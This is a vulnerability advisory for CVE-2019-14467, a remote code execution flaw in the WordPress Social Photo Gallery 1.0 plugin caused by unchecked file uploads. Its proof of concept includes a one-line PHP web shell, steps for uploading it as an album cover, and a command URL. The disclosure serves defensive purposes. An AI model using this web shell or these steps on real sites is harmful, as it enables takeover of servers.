WordPress Social Gallery plugin version 1.0 suffers from a remote code execution vulnerability.
1bb9591e3cec19df6dd4e98eaea723af
=============================================
PRESTIGIA SEGURIDAD ALERT 2019-001
- Original release date: July 31, 2019
- Last revised: November 13, 2019
- Discovered by: Prestigia Seguridad
- Severity: 7,5/10 (CVSS Base Score)
- CVE-ID: CVE-2019-14467
=============================================
I. VULNERABILITY
-------------------------
WordPress Plugin Social Photo Gallery 1.0 - Remote Code Execution
II. BACKGROUND
-------------------------
Social Gallery is the ultimate lightbox plugin for WordPress. Your images
deserve to be experienced and shared, to spark a response as they travel
the social web, and to work for you by generating more fans and more Likes
for your content.
III. DESCRIPTION
-------------------------
The version of WordPress Plugin Social Photo Gallery is affected by a
Remote Code Execution vulnerability.
The application does not check the extension when a imagen of a album is
uploaded, resulting in a execution of php code.
To exploit the vulnerability only is needed create a album in the
application and attach a malicious php file in the cover photo album.
IV. PROOF OF CONCEPT
-------------------------
1. Create a .php archive (cmd.php):
<?php system($_GET['cmd']); ?>
2. Click Add Album, select the name, for example "demo" and in the "Cover
Photo" select the cmd.php file.
3. Load the next URL and magic:
http://127.0.0.1/wordpress/wp-content/uploads/socialphotogallery/demo/cmd.php?cmd=ls
V. BUSINESS IMPACT
-------------------------
Execute local commands in the server result from these attacks.
VI. SYSTEMS AFFECTED
-------------------------
WordPress Plugin Social Photo Gallery 1.0
VII. SOLUTION
-------------------------
The solution is only allow upload Digital Image Files: TIFF, JPEG, GIF, PNG
VIII. REFERENCES
-------------------------
https://wordpress.org/plugins/social-photo-gallery/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Prestigia Seguridad
Email: [email protected]
X. REVISION HISTORY
-------------------------
July 31, 2019 1: Initial release
November 13, 2019 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-------------------------
July 31, 2019 1: Vulnerability acquired by Prestigia Seguridad
July 31, 2019 2: Email to vendor without response
August 15, 2019 3: Second email to vendor without response
November 13, 2019 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Prestigia Seguridad
https://seguridad.prestigia.es/